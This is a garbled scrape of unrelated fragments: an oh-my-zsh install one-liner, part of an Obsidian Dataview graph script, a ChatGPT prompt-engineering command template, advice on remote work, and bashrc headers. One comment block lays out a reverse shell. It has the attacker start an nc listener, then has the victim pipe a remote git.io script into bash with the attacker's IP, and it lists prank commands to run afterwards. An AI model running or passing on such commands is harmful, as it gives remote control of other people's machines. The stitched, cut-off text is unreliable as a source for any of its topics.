sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
- Download zsh-autosuggestions by
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// If too many connections are found, mermaid wont render them. | |
// Thus, we have to limit either how deep we go via "var specifiedDepth = X;" | |
// Or, we can reduce amount of links shown "maxLinks = X" | |
var inlinks = [...new Set(dv.current().file.inlinks.map(link => link.path.split('/').pop().replace('.md', '')))]; | |
var outlinks = [...new Set(dv.current().file.outlinks.map(link => link.path.split('/').pop().replace('.md', '')))]; | |
var graph = []; | |
var classList = []; | |
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Upon starting our interaction, auto run these Default Commands throughout our entire conversation. Refer to Appendix for command library and instructions: | |
/role_play "Expert ChatGPT Prompt Engineer" | |
/role_play "infinite subject matter expert" | |
/auto_continue "♻️": ChatGPT, when the output exceeds character limits, automatically continue writing and inform the user by placing the ♻️ emoji at the beginning of each new part. This way, the user knows the output is continuing without having to type "continue". | |
/periodic_review "🧐" (use as an indicator that ChatGPT has conducted a periodic review of the entire conversation. Only show 🧐 in a response or a question you are asking, not on its own.) | |
/contextual_indicator "🧠" | |
/expert_address "🔍" (Use the emoji associated with a specific expert to indicate you are asking a question directly to that expert) | |
/chain_of_thought | |
/custom_steps | |
/auto_suggest "💡": ChatGPT, during our interaction, you will automatically suggest helpful commands when appropriate, using the |
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# run `nc -nvl 80` on attacker machine first | |
# run `curl -Ls https://git.io/JJeRK | bash -s <attacker-ip> 80` on victim machine | |
# great commands to run: | |
# * curl http://discovermagazine.com/~/media/import/images/b/e/b/chimpmedia.jpg -o /tmp/monkey.jpg | |
# open /tmp/monkey.jpg | |
# * say hello | |
# * open http://lmgtfy.com/?q=how+to+lock+mac | |
# * ls |
have an advocate, ideally at the VP or C-Level, who is personally invested in making remote work. When I started at Etsy, I remember Kellan asking me directly "what can I do to make working remote better?" and Marc repeatedly checking in with me about remote qua remote. This has the obvious benefit of people who have power to make changes knowing about what changes to make and pushing things in a remote-friendly direction, but IME it also has an incredible effect on the morale of remotes. Remote morale is even more subject to perturbation than onsite morale, so this matters.
Avi Bryant said something once that really resonated: try to hire extroverts as remotes. I'm an introvert AND I'm shy and lots of the things I struggle with as a remote are, I think, tied up with that. My default action is not to reach out to people; it's a thing I have to nudge myself to do every time I need to do it, and minor barriers can grow in my head.
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# SOURCED ALIAS'S AND SCRIPTS BY zachbrowne.me | |
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# Source global definitions | |
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